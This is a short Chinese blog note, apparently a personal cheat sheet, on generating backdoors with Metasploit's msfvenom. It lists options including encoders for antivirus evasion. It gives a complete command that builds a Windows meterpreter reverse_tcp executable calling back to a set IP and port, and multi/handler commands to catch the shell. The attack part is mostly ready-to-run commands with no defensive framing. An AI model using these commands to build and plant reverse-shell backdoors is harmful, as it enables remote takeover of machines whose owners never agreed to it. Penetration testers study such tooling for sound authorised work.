Msf-shellcode

做个小笔记

Metasploit可以生成各种格式的后门,有php、exe(windows下后门)、linux环境下后门,java后门、androiw后门等等。

可以生成asp、aspx、php、jsp、war、exe等多种类型

msfvenom
#参数
-p, --payload     <payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定
-l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled     <length>        为payload预先指定一个NOP滑动长度
-f, --format      <format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder    [encoder]       指定需要使用的encoder(编码器)
-a, --arch        <architecture>  指定payload的目标架构
--platform    <platform>      指定payload的目标平台
-s, --space       <length>        设定有效攻击荷载的最大长度
-b, --bad-chars   <list>          设定规避字符集,比如: '\x00\xff'
-i, --iterations <count>          指定payload的编码次数
-c, --add-code    <path>          指定一个附加的win32 shellcode文件
-x, --template    <path>          指定一个自定义的可执行文件作为模板
-k, --keep                        保护模板程序的动作,注入的payload作为一个新的进程运行
--payload-options            列举payload的标准选项
-o, --out   <path>               保存payload
-v, --var-name <name>             指定一个自定义的变量,以确定输出格式
--shellest                   最小化生成payload
-h, --help                        查看帮助选项
--help-formats               查看msf支持的输出格式列表

例如查看编码方式

msfvenom -l encoders

首先选择payload:

show payloads

具体工根据目标操作系统和免杀需要来决定用什么payload
可以直接use使用payload,再进行相关配置

use windows/meterpreter/reverse_tcp

指定 x86

--arch x86 --platform windows

-f指定输出格式

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=1234 -f exe > /a.exe

设置监听

use exploits/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.10.106
set LPOST 1234
exploit

发表评论

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据